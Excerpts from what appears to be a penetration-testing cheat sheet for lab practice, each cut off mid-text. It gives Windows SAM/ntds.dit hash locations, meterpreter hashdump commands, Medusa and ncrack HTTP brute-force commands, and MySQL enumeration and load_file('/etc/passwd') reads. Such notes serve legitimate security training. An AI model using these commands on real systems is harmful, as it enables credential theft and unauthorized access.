-
Windows clients use SAM files. Windows DC uses ntds.dit to store all hashes from the domain. SAM C:\windows\repair\sam C:\windows\System32\config\SAM C:\windows\System32\config\RegBack\SAM Alternatives in meterpreter: run post/windows/gather/hashdump run post/windows/gather/smart_hashdump run hashdump hashdump (load module before: use priv) creds_all If hashdump doesn’t work: Notes Format Username : UID : LM hash : NTLM hash : : : For hashcat,…
-
With Medusa Doesn’t seem to work with virtual hosts! medusa -h 10.11.1.49 -u bethany -P Dog_Names_normalized.txt -M http -m DIR:/~Public -T 2 With ncrack Doesn’t seem to work with virtual hosts! ncrack -vv --user bethany -P Dog_Names_normalized.txt http://10.11.1.49:9505 -m http:path=/~Public/ With metasploit Use module auxiliary/scanner/http/http_login Virtual hosts If Host headers are not supported: More
-
(!) See also Password spraying to check a obtained password against usernames. Note: Use http://rumkin.com/tools/cipher/ if you have to encode/decrypt/decipher something on the fly. Wordlist optimization If there is a password policy known: Check password policy In Windows, type net accounts to get informations about account locking, lockout threasholds etc. Cloud-based performance cracking See NPK Default passwords Hashcat Am…
-
Connect: mysql --host=10.10.10.13 -P4444 -u admin admin Various commands: Enumeration Nmap scripts nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim Exploitation Read and write Read with the current process id: SELECT load_file('/etc/passwd'); Write as the daemon process id: CREATE TABLE bbb(content TEXT); INSERT INTO bbb (content)…